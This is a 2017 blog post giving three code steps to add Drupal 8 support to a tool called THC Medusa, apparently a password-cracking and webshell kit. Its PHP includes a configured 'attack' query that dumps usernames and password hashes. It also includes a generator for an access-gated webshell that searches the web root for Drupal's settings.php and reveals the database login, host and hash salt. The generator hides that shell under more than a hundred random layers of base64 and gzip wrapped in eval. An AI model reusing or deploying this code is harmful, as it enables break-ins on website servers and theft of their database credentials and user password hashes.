zaterdag 25 maart 2017

Drupal 8 support for THC Medusa

Step 1:
Save the data below as /forums/drupal/drupalc.php
<?php
class Crypt {
public static function randomBytes($count) {
return random_bytes($count);
}
public static function hmacBase64($data, $key) {
if (!is_scalar($data) || !is_scalar($key)) {
throw new \InvalidArgumentException('Both parameters passed to \Drupal\Component\Utility\Crypt::hmacBase64 must be scalar values.');
}
$hmac = base64_encode(hash_hmac('sha256', $data, $key, TRUE));
return str_replace(['+', '/', '='], ['-', '_', ''], $hmac);
}
public static function hashBase64($data) {
$hash = base64_encode(hash('sha256', $data, TRUE));
return str_replace(['+', '/', '='], ['-', '_', ''], $hash);
}
public static function hashEquals($known_string, $user_string) {
if (function_exists('hash_equals')) {
return hash_equals($known_string, $user_string);
}
else {
if (!is_string($known_string)) {
trigger_error(sprintf("Expected known_string to be a string, %s given", gettype($known_string)), E_USER_WARNING);
return FALSE;
}
if (!is_string($user_string)) {
trigger_error(sprintf("Expected user_string to be a string, %s given", gettype($user_string)), E_USER_WARNING);
return FALSE;
}
$known_len = strlen($known_string);
if ($known_len !== strlen($user_string)) {
return FALSE;
}
$result = 0;
for ($i = 0; $i < $known_len; $i++) {
$result |= (ord($known_string[$i]) ^ ord($user_string[$i]));
}
return $result === 0;
}
}
public static function randomBytesBase64($count = 32) {
return str_replace(['+', '/', '='], ['-', '_', ''], base64_encode(static::randomBytes($count)));
}
}
class PhpassHashedPassword implements PasswordInterface {
const MIN_HASH_COUNT = 7;
const MAX_HASH_COUNT = 30;
const HASH_LENGTH = 55;
public static $ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
protected $countLog2;
function __construct($countLog2) {
$this->countLog2 = $this->enforceLog2Boundaries($countLog2);
}
protected function base64Encode($input, $count) {
$output = '';
$i = 0;
do {
$value = ord($input[$i++]);
$output .= static::$ITOA64[$value & 0x3f];
if ($i < $count) {
$value |= ord($input[$i]) << 8;
}
$output .= static::$ITOA64[($value >> 6) & 0x3f];
if ($i++ >= $count) {
break;
}
if ($i < $count) {
$value |= ord($input[$i]) << 16;
}
$output .= static::$ITOA64[($value >> 12) & 0x3f];
if ($i++ >= $count) {
break;
}
$output .= static::$ITOA64[($value >> 18) & 0x3f];
} while ($i < $count);

return $output;
}
protected function generateSalt() {
$output = '$S$';
$output .= static::$ITOA64[$this->countLog2];
$output .= $this->base64Encode(Crypt::randomBytes(6), 6);
return $output;
}
protected function enforceLog2Boundaries($count_log2) {
if ($count_log2 < static::MIN_HASH_COUNT) {
return static::MIN_HASH_COUNT;
}
elseif ($count_log2 > static::MAX_HASH_COUNT) {
return static::MAX_HASH_COUNT;
}
return (int) $count_log2;
}
protected function crypt($algo, $password, $setting) {
if (strlen($password) > PasswordInterface::PASSWORD_MAX_LENGTH) {
return FALSE;
}
$setting = substr($setting, 0, 12);
if ($setting[0] != '$' || $setting[2] != '$') {
return FALSE;
}
$count_log2 = $this->getCountLog2($setting);
if ($count_log2 != $this->enforceLog2Boundaries($count_log2)) {
return FALSE;
}
$salt = substr($setting, 4, 8);
if (strlen($salt) != 8) {
return FALSE;
}
$count = 1 << $count_log2;
$hash = hash($algo, $salt . $password, TRUE);
do {
$hash = hash($algo, $hash . $password, TRUE);
} while (--$count);
$len = strlen($hash);
$output = $setting . $this->base64Encode($hash, $len);
$expected = 12 + ceil((8 * $len) / 6);
return (strlen($output) == $expected) ? substr($output, 0, static::HASH_LENGTH) : FALSE;
}
public function getCountLog2($setting) {
return strpos(static::$ITOA64, $setting[3]);
}
public function hash($password) {
return $this->crypt('sha512', $password, $this->generateSalt());
}
public function check($password, $hash) {
if (substr($hash, 0, 2) == 'U$') {
$stored_hash = substr($hash, 1);
$password = md5($password);
}
else {
$stored_hash = $hash;
}
$type = substr($stored_hash, 0, 3);
switch ($type) {
case '$S$':
// A normal Drupal 7 password using sha512.
$computed_hash = $this->crypt('sha512', $password, $stored_hash);
break;
case '$H$':
// phpBB3 uses "$H$" for the same thing as "$P$".
case '$P$':
// A phpass password generated using md5. This is an
// imported password or from an earlier Drupal version.
$computed_hash = $this->crypt('md5', $password, $stored_hash);
break;
default:
return FALSE;
}
return $computed_hash && Crypt::hashEquals($stored_hash, $computed_hash);
}
}
interface PasswordInterface {
const PASSWORD_MAX_LENGTH = 512;
public function hash($password);
public function check($password, $hash);
}
/* Drupal */
$_PROPERTIES = array();
$_PROPERTIES['name'] = "Drupal8";
$_PROPERTIES['version'] = "8.x";
$_PROPERTIES['usernamefield'] = "name";
$_PROPERTIES['emailfield'] = "mail";
$_PROPERTIES['hashfield'] = "pass";
$_PROPERTIES['tablename'] = "users_field_data";
$_PROPERTIES['tableprefix'] = "drli_";
$_PROPERTIES['filename'] = "drupal/drupalc.php";
// use post variables instead if values are different from default
if(isset($_POST['iUseDefault']) && $_POST['iUseDefault']==0){
$_PROPERTIES['usernamefield'] = @mysql_real_escape_string($_POST['sUserNameField']);
$_PROPERTIES['emailfield'] = @mysql_real_escape_string($_POST['sEmailField']);
$_PROPERTIES['hashfield'] = @mysql_real_escape_string($_POST['sHashField']);
$_PROPERTIES['tablename'] = @mysql_real_escape_string($_POST['sTableName']);
$_PROPERTIES['tableprefix'] = @mysql_real_escape_string($_POST['sTablePrefix']);
}
$_PROPERTIES['queryraw'] = array();
$_PROPERTIES['queryraw']['attack'] = "SELECT ".$_PROPERTIES['usernamefield']." AS crackuser,".$_PROPERTIES['hashfield']." AS crackpass".(isset($_PROPERTIES['saltfield']) ? ",".$_PROPERTIES['saltfield']." AS crackhash" : "")." FROM ".$_PROPERTIES['tableprefix'].$_PROPERTIES['tablename']." WHERE ".$_PROPERTIES['usernamefield']."<>''";
$_PROPERTIES['queryraw']['getemail'] = "SELECT ".$_PROPERTIES['emailfield']." AS temail FROM ".$_PROPERTIES['tableprefix'].$_PROPERTIES['tablename']." WHERE ".$_PROPERTIES['usernamefield']."='/user/'";
if(isset($_GET['JSON'])){
session_cache_limiter('nocache');
header('Expires: '.gmdate('r',0));
header('Content-type: application/json');
echo json_encode($_PROPERTIES);
}
$_SYSTEM = array();
$_SYSTEM['name'] = $_PROPERTIES['name'];
$_SYSTEM['version'] = $_PROPERTIES['version'];
$_SYSTEM['patterns'] = array();
$_SYSTEM['patterns']['user'] = '/\'username\'\s+=>\s+\'(.*)?\'/';
$_SYSTEM['patterns']['password'] = '/\'password\'\s+=>\s+\'(.*)?\'/';
$_SYSTEM['patterns']['host'] = '/\'host\'\s+=>\s+\'(.*)?\'/';
$_SYSTEM['patterns']['database'] = '/\'database\'\s+=>\s+\'(.*)?\'/';
$_SYSTEM['patterns']['prefix'] = '/\'prefix\'\s+=>\s+\'(.*)?\'/';
$_SYSTEM['patterns']['salt'] = '/\$settings[\'hash_salt\']\s+=\s+\'.*\'/';
$_SYSTEM['file'] = "sites/default/settings.php";
?>
step 2:
Replace the MedusaShell function in crackmeclass.php with:
/* creates a medusa shell */
function MedusaShell($aSystem,$aOptions){
$sShell = "set_time_limit(0);\n";
$sTemplate = "";
if(isset($aOptions['ip'])){
// ip protection
$sShell .= "if(\$_SERVER['REMOTE_ADDR']!=\"".$aOptions['ip']."\"){\n";
$sShell .= " header(\"Location: http://www.google.com\");\n";
$sShell .= " exit;\n";
$sShell .= "}\n";
}
if(isset($aOptions['pass'])){
// password protection
$sShell .= "if(!isset(\$_POST['sPass']) || sha1(\$_POST['sPass'])!=\"".sha1($aOptions['pass'])."\"){\n";
$sShell .= " echo'<html>\n";
$sShell .= " <head></head>\n";
$sShell .= " <body>\n";
$sShell .= " <form method=\"post\">\n";
$sShell .= " <input type=\"password\" name=\"sPass\" /> <input type=\"submit\" name=\"submit\" value=\"Submit\" />\n";
$sShell .= " </form>\n";
$sShell .= " </body>\n";
$sShell .= " </html>';\n";
$sShell .= " exit;\n";
$sShell .= "}\n";
}
// create shell based on system array
$sShell .= "\$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(\$_SERVER['DOCUMENT_ROOT']),RecursiveIteratorIterator::CHILD_FIRST);\n";
$sShell .= "foreach(\$iterator as \$path){\n";
$sShell .= " if(!\$path->isDir()){\n";
$sShell .= " \$sPath = \$path->__toString();\n";
$sShell .= " \$sFile = \"".$aSystem['file']."\";\n";
$sShell .= " if(strtoupper(substr(PHP_OS,0,3))==='WIN'){\n";
$sShell .= " \$sFile = str_replace(\"/\",\"\\\\\",\$sFile);\n";
$sShell .= " }\n";
$sShell .= " if(strpos(\$sPath,\$sFile)!==false){\n";
$sShell .= " \$sData = file_get_contents(\$sPath);\n";
$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['user'])."',\$sData,\$aUser);\n";
$sShell .= " if(!isset(\$aUser[1])){\n";
$sShell .= " continue;\n";
$sShell .= " }\n";
$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['database'])."',\$sData,\$aDB);\n";
$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['password'])."',\$sData,\$aPass);\n";
$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['host'])."',\$sData,\$aHost);\n";
$sShell .= " if(isset(\$aSystem['patterns']['salt'])){\n";
$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['salt'])."',\$sData,\$aSalt);\n";
$sShell .= " }\n";
$sShell .= " if(isset(\$aSystem['patterns']['prefix'])){\n";
$sShell .= " preg_match('".str_replace("'","\'",$aSystem['patterns']['prefix'])."',\$sData,\$aPrefix);\n";
$sShell .= " }\n";
$sShell .= " \$sResult = \"<b>user:</b> \".\$aUser[1].\"<br />\";\n";
$sShell .= " \$sResult .= \"<b>pass:</b> \".\$aPass[1].\"<br />\";\n";
$sShell .= " \$sResult .= \"<b>host:</b> \".\$aHost[1].\"<br />\";\n";
$sShell .= " \$sResult .= \"<b>database:</b> \".\$aDB[1].\"<br />\";\n";
$sShell .= " if(isset(\$aSystem['patterns']['prefix'])){\n";
$sShell .= " \$sResult .= \"<b>prefix:</b> \".\$aPrefix[1].\"<br />\";\n";
$sShell .= " }\n";
$sShell .= " if(isset(\$aSystem['patterns']['salt'])){\n";
$sShell .= " \$sResult .= \"<b>hash:</b> \".\$aSalt[1].\"<br />\";\n";
$sShell .= " }\n";
$sShell .= " die(\$sResult);\n";
$sShell .= " }\n";
$sShell .= " }\n";
$sShell .= "}\n";
$sShell .= "die(\"Failed to get login information.\");\n";
if(isset($aOptions['encrypt'])){
// source protection
if($aOptions['encrypt']=="normal"){
$sShell = "eval(base64_decode('".base64_encode($sShell)."'));\n";
}
else{
$sEncoder = "\$sPull = \"leverage the inflatable base 4/16 and_or gza jump to tor strings code compressing unescaped\";\n";
$sEncoder .= "\$aPull = explode(\" \",\$sPull);\n";
$sEncoder .= "\$aF = array();\n";
$sEncoder .= "\$aF[] = \$sPull[1].\$sPull[2].\$sPull[5].\$sPull[0];\n";//eval
$sEncoder .= "\$aF[] = substr(\$sPull,57,3).\$sPull[4].\$aF[0][0].\$aF[0][1];\n";//strrev
$sEncoder .= "\$aF[] = substr(\$sPull,41,2).substr(\$sPull,13,6).\$aF[0][0];\n";//gzinflate
$sEncoder .= "\$aF[] = \$aF[2][0].\$aF[2][1].\$sPull[(strpos(\$sPull,\"_\")-1)].\$aF[0][0].substr(\$aF[2],4);\n";//gzdeflate
$sEncoder .= "\$aF[] = \$aPull[3].str_replace(\"1/\",\"\",\$aF[1](\$aPull[4])).\"_\".\$aF[0][0].\$aF[2][3].\$aPull[11];\n";//base64_encode
$sEncoder .= "\$aF[] = substr(\$aF[4],0,7).\$aF[3][2].\$aF[0][0].substr(\$aF[4],9);\n";//base64_decode
$sEncoder .= "\$aF[] = substr(\$aF[3],0,2).substr(\$aPull[13],0,2).substr(\$aPull[12],0,8);\n";//gzuncompress
$sEncoder .= "\$aF[] = str_replace(substr(\$aPull[13],0,2),\"\",\$aF[6]);\n";//gzcompress
// encode and decode functions
$_ENCODE = array();
$_ENCODE[0] = array(7,"gzcompress");
$_ENCODE[1] = array(4,"base64_encode");
$_DECODE = array();
$_DECODE[0] = array(6,"gzuncompress");
$_DECODE[1] = array(5,"base64_decode");
// good luck decrypting the shell :p
$iEncryptions = count($_ENCODE)-1;
$iEncryptionLoops = mt_rand(120,150);
for($x=0;$x<$iEncryptionLoops;$x++){
$iEncryption = mt_rand(0,$iEncryptions);
$sShell = "\$aF[".$_ENCODE[$iEncryption][0]."]('".$_ENCODE[$iEncryption][1]($sShell)."')";
}
$sShell = $sEncoder.$sShell.";";
}
}
if(isset($aOptions['shellcreate'])){
// save source
return($this->WriteF($aOptions['shellcreate'],"<?php\n".$sShell."?>","w"));
}
else{
$sShell = str_replace("\n","<br />\n",htmlspecialchars("<?php\n".$sShell)."?>");
return($sShell);
}
}
step 3:
Add this to the UserLogin function:
case"Drupal8":
$cDrupal8 = new PhpassHashedPassword();
return($cDrupal8->check($sPass,$sHash) ? true : false);
break;

Geen opmerkingen:

Een reactie posten